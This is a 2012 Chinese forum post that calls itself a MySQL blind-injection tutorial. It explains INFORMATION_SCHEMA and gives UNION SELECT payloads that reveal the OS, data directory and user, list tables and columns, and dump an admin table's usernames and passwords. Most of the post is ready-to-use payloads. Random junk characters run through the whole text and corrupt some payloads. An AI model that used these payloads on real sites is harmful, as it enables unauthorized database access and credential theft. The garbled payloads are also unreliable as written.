本文介绍MYSQL盲注的一些语句和方法
6 \# L, b; S# [
0 }0 s9 z& F. @* d/ @学习盲注前先了解下 IFORMATION_SCHEMA 库8 p# m2 R$ s: j
* _/ ~ w- m5 X- T! h/ CMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有( L5 L0 m* X5 q1 r) E' n
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
/ \2 p, [, X( \& R! y4 V1.得到所有数据库名:
c6 N& |9 T3 t9 p: P3 b5 @|SCHEMATA ->存储数据库名的表; e$ b6 r! O6 Q! m6 C$ O4 Z7 L+ j
|---字段:SCHEMA_NAME ->数据库名称
1 \$ z* c+ Q0 l& X) y( X' j9 A
9 l/ i( r, b7 T' o|TABLES ->存储表名# G/ K' B3 W4 {4 S/ |5 d
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名0 }+ K) s/ Q) K" `, H
|---字段:TABLE_NAME ->存储表的表名" a- E) v! D, h0 N7 D8 \: M3 \! o* S
9 U- t3 |! H5 P- Z8 s7 [|COLUMNS ->存储的字段名表- A8 I- N% I1 H1 n: s8 D
|---字段:TABLE_SCHEMA ->该字段所属数据库名
, I' D! E i2 j) j; D! h7 Z$ w|---字段:TABLE_NAME ->存储所属表的名称( g; F. z( g6 X/ X3 ~2 V
' _- p- [/ x, U! s$ Y$ x
|---字段:COLUMN_NAME ->该字段的名称
, V9 B% @0 B! \2 [" h8 x: M
3 d* \/ n# u8 a% J8 t9 _) c" M; L , Y6 T& y( h$ @1 W9 N
! B8 ^% s8 X* p" s1 a( }###########################################################################
3 Y1 E# ~/ w1 o6 v. [! B* e6 E& [' F" }- ?" P6 F. }
0x001 获取系统信息:" W+ o, P6 O0 i" j% a4 ~0 H4 I
) a& ?: t4 K7 l& [union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
& |8 J1 ]& w& o+ v( ^* z! D$ J
E1 b7 A N& U( G2 w/*' b3 j/ W7 F" c4 n
( r4 B4 |! n! H6 h5 L@@global.version_compile_os 获取系统版本
4 K. E* z9 d& k1 O( s1 @% O* S0 T: @% L
@@datadir 数据库路径3 K; g2 L- q% j) u
database() 当前数据库名称
' X+ ~/ C/ `# v2 ]4 s5 S9 k0x3c62723e 换行HEX值
& D6 Y% D& K" H$ j5 r' C3 u+ r7 x" D' ~$ E( O, m0 ~
*// S3 e7 m4 [. d6 R) T% p
' ?. e4 f6 D; j( D" ]! d# p$ ^
8 r& L7 h3 ^; F4 q
- G% R2 p& p+ g
######################################################################8 B3 ?# V3 O! q o l) h4 m$ W
- G j' l* O4 j1 [
0x002 获取表名5 ^$ _- m1 ~( ? l
! G/ g7 i- b- _! p2 u# }union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*, q+ s8 `6 u# W
- n+ j. \$ z9 W( V" W; D: \; T! U
: _7 R2 r& u' _7 l& f: O1 U# M0 d+ }$ P# ^
/*
6 k3 b {" V9 V5 r9 Z% A2 h5 M% I( `2 s9 B2 m2 r& ]7 w9 l
0x67617264656e 为当前数据库名+ I( U. Y7 T0 n; e" }+ J, }. f
; _" m7 h0 F2 P v
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名/ L+ c! g) s: Q. h# V3 Y
! R8 [* l# [& u9 y2 z# @*/
. N- o& g: F) l' w3 p
( C2 |/ X+ w" Y V; o######################################################################& V$ W+ A5 @+ D8 R
3 X0 z& Q* V, d+ D! O
: C8 \- \3 A* I( W$ Z! v* ~3 e
" u1 A# I4 R m3 [. k
0x003 获取字段7 ~1 y; N+ A0 r% V5 ^) w7 t
" e8 o) x$ \& ?. D$ [* j( |
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*: k8 [0 }! _* {, c! b) z" |- O+ j
' q4 M$ H% w. T2 X/*
6 O! r: _. h0 A h; f* d% q
$ G& i2 g/ `: t1 x& @, `group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段& I* ~; p+ n6 `* _# k! U* q
' n, y) z0 b8 v% `0x61646d696e ->选择一个表3 L- g& B& ]; h2 O# N% k
- A4 {- V0 R1 V/ H$ k6 V. W9 Q; D
0x67617264656e ->数据库名
$ G; E, m$ s& d, b9 h
6 g. ^: i. ?7 o8 H9 ]*/* L) j9 X) v) I/ U# a
- K& X4 ~0 J$ V#####################################################################/ m& V) Q/ u" e9 Q0 q4 s9 K1 k
" }; q9 y j& W( n
# t5 Y- n u$ }2 v0 W$ X+ v
3 {$ k4 h/ e9 T' m" B6 E; w% Q0x004 获取数据2 Z8 T- _5 G6 ~- y+ T
( Z9 l! s8 G5 A" B3 n: X ]- _union select 1,2,32 @, p, z- ~( B. Q
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin+ h# j( y! k2 G5 W* S7 W+ t
" d0 S% e0 e6 A% C2 ?" sunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin% r9 `% Z( |" {* b
9 V, L; b9 O7 [9 B- I
( W/ _$ H6 w$ {2 `/ X+ W
! [! @2 X; }" g8 W3 ~0 T2 I/*, P$ g9 P5 P. ]* a% e- x3 D$ G' g
@; L! a+ v9 r R* K3 T5 d2 C0x3c62723e 换行符号HEX编码
/ t1 k! H1 R. v4 g: S, w* @- a# h2 I& V+ _( w I% ?. J/ L2 s
group_concat 同时获得该字段所有数据
& |. n" [+ v' ~8 K$ u: |# W& ~+ o j7 n" h0 L
*/7 D' o( a' y4 z1 A
. A6 p& s0 u$ g/ r" s6 Y |
发表于 2012-9-13 17:48:44
收藏
支持
反对